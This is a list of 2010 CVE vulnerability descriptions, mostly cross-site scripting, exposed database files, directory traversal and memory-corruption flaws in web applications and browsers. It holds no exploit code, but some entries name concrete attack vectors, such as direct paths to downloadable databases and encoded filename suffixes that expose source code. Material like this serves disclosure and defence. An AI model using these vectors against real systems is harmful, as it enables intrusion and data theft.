[CVE-2010-1164] Multiple cross-site scripting (XSS) vulnerabilities in Atlassian JIRA 3.12 through 4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) element or (2) defaultColor parameter to the Colour Picker page.
[CVE-2010-1143] Cross-site scripting (XSS) vulnerability in VMware View (formerly Virtual Desktop Manager or VDM) 3.1.x before 3.1.3 build 252693 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1137] Cross-site scripting (XSS) vulnerability in WebAccess in VMware VirtualCenter 2.0.2 and 2.5 and VMware ESX 3.0.3 and 3.5, and the Server Console in VMware Server 1.0, allows remote attackers to inject arbitrary web script or HTML via the name of a virtual machine.
[CVE-2010-1126] The JavaScript implementation in WebKit allows remote attackers to send selected keystrokes to a form field in a hidden frame, instead of the intended form field in a visible frame, via certain calls to the focus method.
[CVE-2010-1119] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010.
[CVE-2010-1116] LookMer Music Portal stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for dbmdb/LookMerSarkiMDB.mdb.
[CVE-2010-1115] Directory traversal vulnerability in news/include/customize.php in Web Server Creator - Web Portal 0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the l parameter.
[CVE-2010-1114] Multiple PHP remote file inclusion vulnerabilities in Web Server Creator - Web Portal 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) pg parameter to index.php and the (2) path parameter to news/form.php.
[CVE-2010-1113] Cross-site scripting (XSS) vulnerability in the forum page in Web Server Creator - Web Portal 0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors to index.php.
[CVE-2010-1112] Cross-site scripting (XSS) vulnerability in cat.php in KloNews 2.0 allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2010-1111] Multiple cross-site scripting (XSS) vulnerabilities in Jokes Complete Website allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to joke.php and the (2) searchingred parameter to results.php.
[CVE-2010-1108] Cross-site scripting (XSS) vulnerability in the Control Panel module 5.x through 5.x-1.5 and 6.x through 6.x-1.2 for Drupal allows remote authenticated users, with "administer blocks" privileges, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1105] Cross-site scripting (XSS) vulnerability in cgi/index.php in AdvertisementManager 3.1.0 and 3.6 allows remote attackers to inject arbitrary web script or HTML via the usr parameter.
[CVE-2010-1104] Cross-site scripting (XSS) vulnerability in Zope 2.8.x before 2.8.12, 2.9.x before 2.9.12, 2.10.x before 2.10.11, 2.11.x before 2.11.6, and 2.12.x before 2.12.3 allows remote attackers to inject arbitrary web script or HTML via vectors related to error messages.
[CVE-2010-1102] Integer overflow in OmniWeb allows remote attackers to bypass intended port restrictions on outbound TCP connections via a port number outside the range of the unsigned short data type, as demonstrated by a value of 65561 for TCP port 25.
[CVE-2010-1095] Cross-site scripting (XSS) vulnerability in login_reset_password_page.php in Tracking Requirements & Use Cases (TRUC) 0.11.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter. NOTE: the provenance of this information is unknown
[CVE-2010-1091] Multiple cross-site scripting (XSS) vulnerabilities in contact.php in phpMySite allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) city, (3) email, (4) state, and (5) message parameters.
[CVE-2010-1080] Cross-site scripting (XSS) vulnerability in view.php in Pulse CMS 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the f parameter.
[CVE-2010-1079] Cross-site scripting (XSS) vulnerability in Sawmill before 7.2.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1076] Cross-site scripting (XSS) vulnerability in index.php in Entry Level CMS (EL CMS) allows remote attackers to inject arbitrary web script or HTML via the subj parameter, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown
[CVE-2010-1074] Cross-site scripting (XSS) vulnerability in the Currency Exchange module before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to watchdog logging.
[CVE-2010-1072] Cross-site scripting (XSS) vulnerability in search.php in Sniggabo CMS 2.21 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2010-1068] Multiple cross-site scripting (XSS) vulnerabilities in surgeftpmgr.cgi in NetWin SurgeFTP 2.3a6 allow remote attackers to inject arbitrary web script or HTML via the (1) domainid or (2) classid parameter in a class action.
[CVE-2010-1067] E-membres 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/bdEMembres.mdb.
[CVE-2010-1066] AR Web Content Manager (AWCM) 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for control/db_backup.php.
[CVE-2010-1065] Lebisoft Ziyaretci Defteri 7.4 and 7.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/lebisoft.mdb.
[CVE-2010-1064] Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/ajxgaleri.mdb.
[CVE-2010-1052] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AudiStat 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) year and (2) mday parameters. NOTE: the provenance of this information is unknown
[CVE-2010-1048] Cross-site scripting (XSS) vulnerability in blog/index.php in Uiga Business Portal allows remote attackers to inject arbitrary web script or HTML via the textcomment parameter (aka the Comment Box) in a noentryid action. NOTE: some of these details are obtained from third party information.
[CVE-2010-1041] Unspecified vulnerability in the single sign-on functionality in the Web Services implementation in IBM DB2 Content Manager (CM) Toolkit 8.3 before FP13 on z/OS and DB2 Information Integrator for Content 8.3 before FP13 has unknown impact and remote attack vectors.
[CVE-2010-1036] Cross-site scripting (XSS) vulnerability in HP System Insight Manager before 6.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1029] Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod touch, and Google Chrome 4.0.249, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a STYLE element composed of a large number of *> sequences.
[CVE-2010-1028] Integer overflow in the decompression functionality in the Web Open Fonts Format (WOFF) decoder in Mozilla Firefox 3.6 before 3.6.2 and 3.7 before 3.7 alpha 3 allows remote attackers to execute arbitrary code via a crafted WOFF file that triggers a buffer overflow, as demonstrated by the vd_ff module in VulnDisco 9.0.
[CVE-2010-1025] Cross-site scripting (XSS) vulnerability in the TGM-Newsletter (tgm_newsletter) extension 0.0.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1023] Cross-site scripting (XSS) vulnerability in the UserTask Center, Recent (taskcenter_recent) extension 0.1.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1021] Cross-site scripting (XSS) vulnerability in the Typo3 Quixplorer (t3quixplorer) extension before 1.7.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1020] Cross-site scripting (XSS) vulnerability in the Simple Gallery (sk_simplegallery) extension 0.0.9 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1014] Cross-site scripting (XSS) vulnerability in the Reports Logfile View (reports_logview) extension 1.2.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1011] Cross-site scripting (XSS) vulnerability in the myDashboard (mydashboard) extension 0.1.13 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1008] Cross-site scripting (XSS) vulnerability in the Sellector.com Widget Integration (chsellector) extension before 0.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1005] Cross-site scripting (XSS) vulnerability in the Yet another TYPO3 search engine (YATSE) extension before 0.3.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0998] Multiple stack-based buffer overflows in Free Download Manager (FDM) before 3.0.852 allow remote attackers to execute arbitrary code via vectors involving (1) the folders feature in Site Explorer, (2) the websites feature in Site Explorer, (3) an FTP URI, or (4) a redirect.
[CVE-2010-0997] Cross-site scripting (XSS) vulnerability in 107_plugins/content/content_manager.php in the Content Management plugin in e107 before 0.7.20, when the personal content manager is enabled, allows user-assisted remote authenticated users to inject arbitrary web script or HTML via the content_heading parameter.
[CVE-2010-0984] Acidcat CMS 3.5.3 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for databases/acidcat_3.mdb.
[CVE-2010-0982] Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
[CVE-2010-0979] Cross-site scripting (XSS) vulnerability in display.php in Obsession-Design Image-Gallery (ODIG) 1.1 allows remote attackers to inject arbitrary web script or HTML via the folder parameter.
[CVE-2010-0978] KMSoft Guestbook (aka GBook) 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/db.mdb.
[CVE-2010-0977] PD PORTAL 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/db.mdb.
[CVE-2010-0971] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.6.4 allow remote authenticated users, with Instructor privileges, to inject arbitrary web script or HTML via the (1) Question and (2) Choice fields in tools/polls/add.php, the (3) Type and (4) Title fields in tools/groups/create_manual.php, and the (5) Title field in assignments/add_assignment.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-0965] Jevci Siparis Formu Scripti stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for siparis.mdb.
[CVE-2010-0964] SQL injection vulnerability in start.php in Eros Webkatalog allows remote attackers to execute arbitrary SQL commands via the id parameter in a rubrik action.
[CVE-2010-0963] Cross-site scripting (XSS) vulnerability in index.php in dl Download Ticket Service before 0.7 allows remote attackers to inject arbitrary web script or HTML via the t parameter, related to an invalid ticket ID. NOTE: some of these details are obtained from third party information.
[CVE-2010-0959] Cross-site scripting (XSS) vulnerability in WebEditor/Authentication/LoginPage.aspx in IBM ENOVIA SmarTeam 5 allows remote attackers to inject arbitrary web script or HTML via the errMsg parameter.
[CVE-2010-0949] Multiple cross-site scripting (XSS) vulnerabilities in Natychmiast CMS allow remote attackers to inject arbitrary web script or HTML via the id_str parameter to (1) index.php and (2) a_index.php.
[CVE-2010-0947] Cross-site scripting (XSS) vulnerability in post.aspx in Max Network Technology BBSMAX 3.0, 4.1, and 4.2 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2010-0941] Multiple cross-site scripting (XSS) vulnerabilities in eTek Systems Hit Counter 2.0 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) inc/login.php, (3) admin/index.php, and (4) admin/forgot.php.
[CVE-2010-0940] Cross-site scripting (XSS) vulnerability in guestbook.php in Simple PHP Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2010-0939] Visialis ABB Forum 1.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for fpdb/abb.mdb.
[CVE-2010-0938] Cross-site scripting (XSS) vulnerability in todooforum.php in Todoo Forum 2.0 allows remote attackers to inject arbitrary web script or HTML via the id_forum parameter in a post action.
[CVE-2010-0936] Cross-site scripting (XSS) vulnerability in auth.asp on the D-LINK DKVM-IP8 with firmware 2282_dlinkA4_p8_20071213 allows remote attackers to inject arbitrary web script or HTML via the nickname parameter.
[CVE-2010-0927] Cross-site scripting (XSS) vulnerability in help/readme.nsf/Header in the Help component in IBM Lotus Domino 7.x before 7.0.4 and 8.x before 8.0.2 allows remote attackers to inject arbitrary web script or HTML via the BaseTarget parameter in an OpenPage action. NOTE: this may overlap CVE-2010-0920.
[CVE-2010-0921] Cross-site request forgery (CSRF) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 allows remote attackers to hijack the authentication of unspecified victims via vectors related to lack of "XSS/CSRF Get Filter and Referer Check fixes."
[CVE-2010-0920] Cross-site scripting (XSS) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 allows remote attackers to inject arbitrary web script or HTML via vectors related to lack of "XSS/CSRF Get Filter and Referer Check fixes."
[CVE-2010-0919] Stack-based buffer overflow in the Lotus Domino Web Access ActiveX control in IBM Lotus iNotes (aka Domino Web Access or DWA) 6.5, 7.0 before 7.0.4, 8.0, 8.0.2, and before 229.281 for Domino 8.0.2 FP4 allows remote attackers to execute arbitrary code via a long URL argument to an unspecified method, aka PRAD7JTNHJ.
[CVE-2010-0918] Multiple unspecified vulnerabilities in the UltraLite functionality in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 have unknown impact and attack vectors.
[CVE-2010-0881] Unspecified vulnerability in the User Interface Components in Oracle Collaboration Suite 10.1.2.4 allows remote attackers to affect integrity via unknown vectors.
[CVE-2010-0849] Unspecified vulnerability in the Java 2D component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is a heap-based buffer overflow in a decoding routine used by the JPEGImageDecoderImpl interface, which allows code execution via a crafted JPEG image.
[CVE-2010-0840] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is related to improper checks when executing privileged methods in the Java Runtime Environment (JRE), which allows attackers to execute arbitrary code via (1) an untrusted object that extends the trusted class but has not modified a certain method, or (2) "a similar trust issue with interfaces," aka "Trusted Methods Chaining Remote Code Execution Vulnerability."
[CVE-2010-0828] Cross-site scripting (XSS) vulnerability in action/Despam.py in the Despam action module in MoinMoin 1.8.7 and 1.9.2 allows remote authenticated users to inject arbitrary web script or HTML by creating a page with a crafted URI.
[CVE-2010-0817] Cross-site scripting (XSS) vulnerability in _layouts/help.aspx in Microsoft SharePoint Server 2007 12.0.0.6421 and possibly earlier, and SharePoint Services 3.0 SP1 and SP2, versions, allows remote attackers to inject arbitrary web script or HTML via the cid0 parameter.
[CVE-2010-0814] The Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 and 2007 SP1 and SP2 do not properly interact with the memory-allocation approach used by Internet Explorer during instantiation, which allows remote attackers to execute arbitrary code via a web site that references multiple ActiveX controls, as demonstrated by the ImexGrid and FieldList controls, aka "Access ActiveX Control Vulnerability."
[CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability."
[CVE-2010-0804] Cross-site scripting (XSS) vulnerability in index.php in iBoutique 4.0 allows remote attackers to inject arbitrary web script or HTML via the key parameter in a products action.
[CVE-2010-0797] Cross-site scripting (XSS) vulnerability in the T3BLOG extension 0.6.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0786] The Web Services Security component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.13 does not properly implement the Java API for XML Web Services (aka JAX-WS), which allows remote attackers to cause a denial of service (data corruption) via a crafted JAX-WS request that leads to incorrectly encoded data.
[CVE-2010-0785] Cross-site request forgery (CSRF) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.13 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
[CVE-2010-0784] Cross-site scripting (XSS) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0783] Cross-site scripting (XSS) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0782] IBM WebSphere MQ 6.x before 6.0.2.10 and 7.x before 7.0.1.3 allows remote attackers to spoof X.509 certificate authentication, and send or receive channel messages, via a crafted Subject Distinguished Name (DN) value in a certificate.
[CVE-2010-0781] Unspecified vulnerability in the administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.33 allows remote authenticated users to cause a denial of service (CPU consumption) via a crafted URL.
[CVE-2010-0780] IBM WebSphere MQ 7.x before 7.0.1.4 allows remote attackers to cause a denial of service (disk consumption) via multiple connection attempts to a stopped queue manager.
[CVE-2010-0779] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.43, 6.1 before 6.1.0.33, and 7.0 before 7.0.0.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0778] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.33 and 7.0 before 7.0.0.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-0777] The Web Container in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.43, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 does not properly handle long filenames and consequently sends an incorrect file in some responses, which allows remote attackers to obtain sensitive information by reading the retrieved file.
[CVE-2010-0776] The Web Container in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.43, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 does not properly handle chunked transfer encoding during a call to response.sendRedirect, which allows remote attackers to cause a denial of service via a GET request.
[CVE-2010-0775] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 allows remote attackers to cause a denial of service (memory consumption and daemon crash) via a crafted request, related to the nodeagent and Deployment Manager components.
[CVE-2010-0774] The (1) JAX-RPC WS-Security 1.0 and (2) JAX-WS runtime implementations in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.11 do not properly handle WebServices PKCS#7 and PKIPath tokens, which allows remote attackers to bypass intended access restrictions via unspecified vectors.
[CVE-2010-0772] Unspecified vulnerability in the channel process in IBM WebSphere MQ 7.0 before 7.0.1.2 allows remote authenticated users to cause a denial of service (daemon crash) via "incorrect channel control data."
[CVE-2010-0770] IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.9 allows remote authenticated users to cause a denial of service (ORB ListenerThread hang) by aborting an SSL handshake.
[CVE-2010-0769] IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.9 does not properly define wsadmin scripting J2CConnectionFactory objects, which allows local users to discover a KeyRingPassword password by reading a cleartext field in the resources.xml file.
[CVE-2010-0768] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.41, 6.1 before 6.1.0.31, and 7.0 before 7.0.0.9 allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2010-0765] fipsForum 2.6 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for _database/forumFips.mdb.
[CVE-2010-0756] Session fixation vulnerability in WikyBlog 1.7.3 rc2 allows remote attackers to hijack web sessions by setting the jsessionid parameter to (1) index.php/Comment/Main, (2) index.php/Comment/Main/Home_Wiky, or (3) index.php/Edit/Main.
[CVE-2010-0754] Cross-site scripting (XSS) vulnerability in index.php/Special/Main/Templates in WikyBlog 1.7.2 and 1.7.3 rc2 allows remote attackers to inject arbitrary web script or HTML via the which parameter in a copy action.
[CVE-2010-0738] The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
[CVE-2010-0736] Cross-site scripting (XSS) vulnerability in the view_queryform function in lib/viewvc.py in ViewVC before 1.0.10, and 1.1.x before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via "user-provided input."
[CVE-2010-0726] Cross-site scripting (XSS) vulnerability in the tb-send.rb (TrackBack transmission) plugin in tDiary 2.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors, possibly related to the (1) plugin_tb_url and (2) plugin_tb_excerpt parameters.
[CVE-2010-0725] Cross-site scripting (XSS) vulnerability in showimg.php in Arab Cart 1.0.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2010-0716] _layouts/Upload.aspx in the Documents module in Microsoft SharePoint before 2010 uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading TXT files, a related issue to CVE-2008-5026. NOTE: the vendor disputes the significance of this issue, because cross-domain isolation can be implemented when needed.
[CVE-2010-0715] Open redirect vulnerability in login.jsp in IBM WebSphere Portal, IBM Lotus Web Content Management (WCM), and IBM Lotus Workplace Web Content Management 5.1.0.0 through 5.1.0.5, 6.0.0.0 through 6.0.0.4, 6.0.1.0 through 6.0.1.7, 6.1.0.0 through 6.1.0.3, and 6.1.5.0
[CVE-2010-0714] Cross-site scripting (XSS) vulnerability in login.jsp in IBM WebSphere Portal, IBM Lotus Web Content Management (WCM), and IBM Lotus Workplace Web Content Management 5.1.0.0 through 5.1.0.5, 6.0.0.0 through 6.0.0.4, 6.0.1.0 through 6.0.1.7, 6.1.0.0 through 6.1.0.3, and 6.1.5.0
[CVE-2010-0706] Cross-site scripting (XSS) vulnerability in the login/prompt component in Subex Nikira Fraud Management System allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2010-0704] Cross-site scripting (XSS) vulnerability in the Portlet Palette in IBM WebSphere Portal 6.0.1.5 wp6015_008_01 allows remote attackers to inject arbitrary web script or HTML via the search field.
[CVE-2010-0703] Cross-site scripting (XSS) vulnerability in wa/auth in PortWise SSL VPN 4.6 allows remote attackers to inject arbitrary web script or HTML via the reloadFrame parameter.
[CVE-2010-0700] Cross-site scripting (XSS) vulnerability in index.php in WampServer 2.0i allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2010-0699] Cross-site scripting (XSS) vulnerability in index.php in VideoSearchScript Pro 3.5 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2010-0697] Cross-site scripting (XSS) vulnerability in the iTweak Upload module 6.x-1.x before 6.x-1.2 and 6.x-2.x before 6.x-2.3 for Drupal allows remote authenticated users, with create content and upload file permissions, to inject arbitrary web script or HTML via the file name of an uploaded file.
[CVE-2010-0695] Cross-site scripting (XSS) vulnerability in pages/index.php in BASIC-CMS allows remote attackers to inject arbitrary web script or HTML via the nav_id parameter.
[CVE-2010-0686] WebAccess in VMware VirtualCenter 2.0.2 and 2.5, VMware Server 2.0, and VMware ESX 3.0.3 and 3.5 allows remote attackers to leverage proxy-server functionality to spoof the origin of requests via unspecified vectors, related to a "URL forwarding vulnerability."
[CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
[CVE-2010-0681] ZeusCMS 0.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request for admin/backup.sql.
[CVE-2010-0675] Cross-site scripting (XSS) vulnerability in index.php in BGSvetionik BGS CMS 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the search parameter in a search action. NOTE: some of these details are obtained from third party information.
[CVE-2010-0674] StatCounteX 3.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for path/stats.mdb.
[CVE-2010-0667] MoinMoin 1.9 before 1.9.1 does not perform the expected clearing of the sys.argv array in situations where the GATEWAY_INTERFACE environment variable is set, which allows remote attackers to obtain sensitive information via unspecified vectors.
[CVE-2010-0665] JAG (Just Another Guestbook) 1.14 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request for jag/database.sql.
[CVE-2010-0661] WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.
[CVE-2010-0659] The image decoder in WebKit before r52833, as used in Google Chrome before 4.0.249.78, does not properly handle a failure of memory allocation, which allows remote attackers to execute arbitrary code in the Chrome sandbox via a malformed GIF file that specifies a large size.
[CVE-2010-0656] WebKit before r51295, as used in Google Chrome before 4.0.249.78, presents a directory-listing page in response to an XMLHttpRequest for a file:/// URL that corresponds to a directory, which allows attackers to obtain sensitive information or possibly have unspecified other impact via a crafted local HTML document.
[CVE-2010-0655] Use-after-free vulnerability in Google Chrome before 4.0.249.78 allows user-assisted remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors involving the display of a blocked popup window during navigation to a different web site.
[CVE-2010-0651] WebKit before r52784, as used in Google Chrome before 4.0.249.78 and Apple Safari before 4.0.5, permits cross-origin loading of CSS stylesheets even when the stylesheet download has an incorrect MIME type and the stylesheet document is malformed, which allows remote attackers to obtain sensitive information via a crafted document.
[CVE-2010-0650] WebKit, as used in Google Chrome before 4.0.249.78 and Apple Safari, allows remote attackers to bypass intended restrictions on popup windows via crafted use of a mouse click event.
[CVE-2010-0648] Mozilla Firefox, possibly before 3.6, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the document.styleSheets[0].href property value, related to an IFRAME element.
[CVE-2010-0647] WebKit before r53525, as used in Google Chrome before 4.0.249.89, allows remote attackers to execute arbitrary code in the Chrome sandbox via a malformed RUBY element, as demonstrated by a <ruby>><table><rt> sequence.
[CVE-2010-0643] Google Chrome before 4.0.249.89 attempts to make direct connections to web sites when all configured proxy servers are unavailable, which allows remote HTTP servers to obtain potentially sensitive information about the identity of a client user via standard HTTP logging, as demonstrated by a proxy server that was configured for the purpose of anonymity.
[CVE-2010-0642] Cisco Collaboration Server (CCS) 5 allows remote attackers to read the source code of JHTML files via URL encoded characters in the filename extension, as demonstrated by (1) changing .jhtml to %2Ejhtml, (2) changing .jhtml to .jhtm%6C, (3) appending %00 after .jhtml, and (4) appending %c0%80 after .jhtml, related to the (a) doc/docindex.jhtml, (b) browserId/wizardForm.jhtml, (c) webline/html/forms/callback.jhtml, (d) webline/html/forms/callbackICM.jhtml, (e) webline/html/agent/AgentFrame.jhtml, (f) webline/html/agent/default/badlogin.jhtml, (g) callme/callForm.jhtml, (h) webline/html/multichatui/nowDefunctWindow.jhtml, (i) browserId/wizard.jhtml, (j) admin/CiscoAdmin.jhtml, (k) msccallme/mscCallForm.jhtml, and (l) webline/html/admin/wcs/LoginPage.jhtml components.
[CVE-2010-0641] Cross-site scripting (XSS) vulnerability in webline/html/admin/wcs/LoginPage.jhtml in Cisco Collaboration Server (CCS) 5 allows remote attackers to inject arbitrary web script or HTML via the dest parameter.
[CVE-2010-0640] Cross-site scripting (XSS) vulnerability in CA eHealth Performance Manager 6.0.x through 6.2.x, when malicious HTML detection is disabled, allows remote attackers to inject arbitrary web script or HTML via a crafted request.
[CVE-2010-0638] Cross-site request forgery (CSRF) vulnerability in WebCalendar 1.2.0 allows remote attackers to hijack the authentication of administrators for requests that change the administrative password via unknown vectors. NOTE: the provenance of this information is unknown.
[CVE-2010-0637] Multiple cross-site request forgery (CSRF) vulnerabilities in WebCalendar 1.2.0, and other versions before 1.2.5, allow remote attackers to hijack the authentication of administrators for requests that (1) delete an event or (2) ban an IP address from posting via unknown vectors. NOTE: some of these details are obtained from third party information.
[CVE-2010-0636] Multiple cross-site scripting (XSS) vulnerabilities in WebCalendar 1.2.0, and other versions before 1.2.5, allow remote attackers to inject arbitrary web script or HTML via the (1) tab parameter to users.php and the PATH_INFO to (2) day.php, (3) month.php, and (4) week.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-0617] Cross-site scripting (XSS) vulnerability in ajax.php in evalSMSI 2.1.03 allows remote attackers to inject arbitrary web script or HTML via the return parameter. NOTE: the provenance of this information is unknown.
[CVE-2010-0615] Cross-site scripting (XSS) vulnerability in assess.php in evalSMSI 2.1.03 allows remote attackers to inject arbitrary web script or HTML via the reports comment box in a continue_assess action. NOTE: some of these details are obtained from third party information.
[CVE-2010-0607] Cross-site scripting (XSS) vulnerability in Forms/status_statistics_1 in the Sterlite SAM300 AX Router allows remote attackers to inject arbitrary web script or HTML via the Stat_Radio parameter.
[CVE-2010-0606] Cross-site scripting (XSS) vulnerability in scp/ajax.php in osTicket before 1.6.0 Stable allows remote authenticated users to inject arbitrary web script or HTML via the f parameter, possibly related to an error message generated by scp/admin.php.
[CVE-2010-0594] Cross-site scripting (XSS) vulnerability in Cisco Router and Security Device Manager (SDM) allows remote attackers to inject arbitrary web script or HTML via unknown vectors, aka Bug ID CSCtb38467.
